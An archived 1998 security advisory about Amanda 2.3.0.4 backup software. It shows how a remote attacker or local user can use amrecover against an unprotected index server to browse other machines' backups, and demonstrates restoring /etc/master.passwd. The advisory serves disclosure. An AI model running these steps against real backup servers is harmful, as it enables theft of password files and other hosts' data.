**************** CPIO Security Notice **************** Issue Number 11: 980105 ************** http://www.darpanet.net ************** **** Amanda backup software **** Amanda version 2.3.0.4 There are serveral security problems in the current version of Amanda. The one that will be talked about today was one of the many problems found by an OpenBSD security audit of their new ports tree. The Amanda Core team has been contacted about these and other problems which are not mentionded in the below advisory. A new Amanda release should be out within a week or two. 1. Any attacker can remotely connect to an index server allowing that person to access any machine being backed up. 2. Any attacker with local access to a machine being backed up has access to any machine being backed up or any partion being backed up. In example 1 the players are: index.servername.net | the affected index server. remote.attacker.org | attackers computer staff | a machine being backed up by the index server 1: [remote%] amrecover -s index.servername.net AMRECOVER Version 1.0. Contacting server on index.servername.net ... 220 index.servername.net AMANDA index server (1.0) ready. Setting restore date to today (1997-12-24) 200 Working date set to 1997-12-24. 200 Config set to DailySet1. 501 No index records for host: remote.attacker.org. Invalid? amrecover> sethost staff 200 Dump host set to staff. amrecover> setdisk wd0a 200 Disk set to wd0a amrecover> ls [ list of root partion ] In example 2 the players are: users | users shell machine being backed up staff | staff machine being backed up 2: [users%] amrecover AMRECOVER Version 1.0. Contacting server on index.servername.net ... 220 index.servername.net AMANDA index server (1.0) ready. Setting restore date to today (1997-12-24) 200 Working date set to 1997-12-24. 200 Config set to DailySet1. 200 Dump host set to users. Divided $CWD into directory /joey on disk wd0f mounted at /home/home1. 200 Disk set to wd0f. amrecover> setdisk wd0a 200 Disk set to wd0a amrecover> cd etc amrecover> add master.passwd Added /etc/master.passwd amrecover> extract Extracting files using tape drive /dev/nrst0 on host index.servername.net. The following tapes are needed: DAILY6 Restoring files into directory /home/home1/joey Continue? [Y/n]: y Load tape DAILY6 now Continue? [Y/n]: y amrecover> quit [local%] pwd /home/home1/joey [local%] ls master.passwd master.passwd Contact: joeyat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:38:36 PDT